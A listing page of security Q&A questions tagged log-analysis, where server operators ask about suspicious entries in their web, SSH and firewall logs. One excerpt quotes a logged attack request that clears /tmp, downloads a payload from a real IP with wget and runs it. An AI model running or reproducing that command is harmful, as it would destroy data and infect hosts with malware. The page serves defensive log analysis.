Questions tagged [log-analysis]

74 questions
36
votes
2 answers

How to prevent users from executing commands through browser URL?

I have very little experience with security (still learning) however was combing through my logs and I noticed the following request: "GET…
user3718908
  • 423
  • 4
  • 6
25
votes
1 answer

Why am I receiving HTTP GETs for a domain I don't own?

I am running a Centos7 web server. I noticed a few strange HTTP GET requests like these: 94.185.83.100 - - [29/Feb/2016:23:29:00 +0530] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0)…
Sriram
  • 373
  • 3
  • 6
14
votes
1 answer

How can I practice log file analysis?

There are a lot of excellent resources to sharpen your pentesting skills (like Hackthebox, Vulnhub, Juiceshop, Burp Suite Academy and so on), but I couldn't find something similar for forensics, especially log file analysis. I thought about setting…
13
votes
2 answers

Weird Log Record from researchscan1.eecs.berkeley.edu (169.229.3.91) - is this a hack attempt?

I was looking through my ufw log record when I found this line: 169.229.3.91 - - [19/Feb/2016:13:21:52 +0100] "\xCEA\x81\xCF\x02\x03\xFCAm\xB8\xBF]1\xBE~0^\xCD\xA9\x05(\x8D`\xD9\x9D\x9D\x9C\x15m" 400 166 "-" "-" Is this a hack attempt?
9
votes
1 answer

Which ssh exploit works by changing the user name in the middle of the process?

Every few hours, I get a few of those in my server logs: sshd[...]: Disconnecting: Change of username or service not allowed: (httpd,ssh-connection) -> (http,ssh-connection) [preauth] sshd[...]: Disconnecting: Change of username or service not…
Heinzi
  • 2,914
  • 2
  • 21
  • 25
6
votes
1 answer

Looking for resources for interpreting my security logs

I am currently setting up an Apache web server on a Linux machine at my house. I am working on a website project which will allow users to log in to complete certain work. There is no open registration on this website. Accounts must be issued by…
Jim Baize
  • 83
  • 6
5
votes
0 answers

http request: your killing me smalls

I was looking through my Apache Status in WHM and noticed this odd line in the log: POST /your/killing/me/smalls.jpg HTTP/1.1 It is mostly from 54.86.11.108 but I have seen at least one other IP. I've tried to search this, but only turn up a movie…
RozzA
  • 201
  • 1
  • 8
5
votes
2 answers

How can I read snort logs in NIDS mode?

I am reading some snort logs from a firewall, I could read some with "snort -r file" But when I had tried the newest logs I get this error: snort -r snort.log Running in packet dump mode --== Initializing Snort ==-- Initializing Output…
bugsam
  • 61
  • 1
  • 1
  • 5
4
votes
2 answers

Log of all processes running on a computer

I'm new to the security domain and I want to ask - Does every program leave an 'imprint' in a log of some kind, in a laptop or a PC - of whatever process it ran. If yes, can they be analysed?
Prathiba
  • 73
  • 5
4
votes
0 answers

Obtaining large data sets for research: MySQL, PHP, Apache, etc

I have been looking around the web for large data sets (specifically web related log files - MySQL, PHP, Apache, and so on) that contains data of attempted intrusions/exploits. I am doing some research on threat intelligence and I'd like to analyze…
user0000001
  • 141
  • 2
4
votes
1 answer

What vulnerability might this invalid HTTP_HOST value be trying to exploit?

I just received an error email from my home web-server (It's a low traffic site, and since it's running a Django application I've written myself getting an email on errors helps me find bugs). Subject: [Django] ERROR (EXTERNAL IP): Invalid HTTP_HOST…
4
votes
2 answers

The UK Terror Watchdog says this is very difficult in practise, is it?

I saw this quote today in the Guardian David Anderson QC, the terror legislation watchdog commissioned to report on the state of Britain’s surveillance laws in the aftermath of Snowden’s disclosures, has previously said that internet…
ian
  • 1,302
  • 11
  • 21
3
votes
1 answer

How to detect changing IP address and user agent on a HTTP session?

I have some HTTP logs where I see the hacker changing his IP every request, and occasionally changing his useragent. Is there a way to detect this automatically? Perhaps a snort rule? or any other way?
user77568
  • 41
  • 3
3
votes
2 answers

Regular Expressions for common exploits

I patched for shellshock and was barraged a few days later. However, I would not have known any attempts were made at all if not for a regular expression I found on the internet. This has inspired me to look further into my logs. Is there any…
Dylan Katz
  • 243
  • 1
  • 3
  • 9
3
votes
1 answer

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs: 170.81.46.70 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello,…
Artimithe55
  • 209
  • 1
  • 7
1
2 3 4 5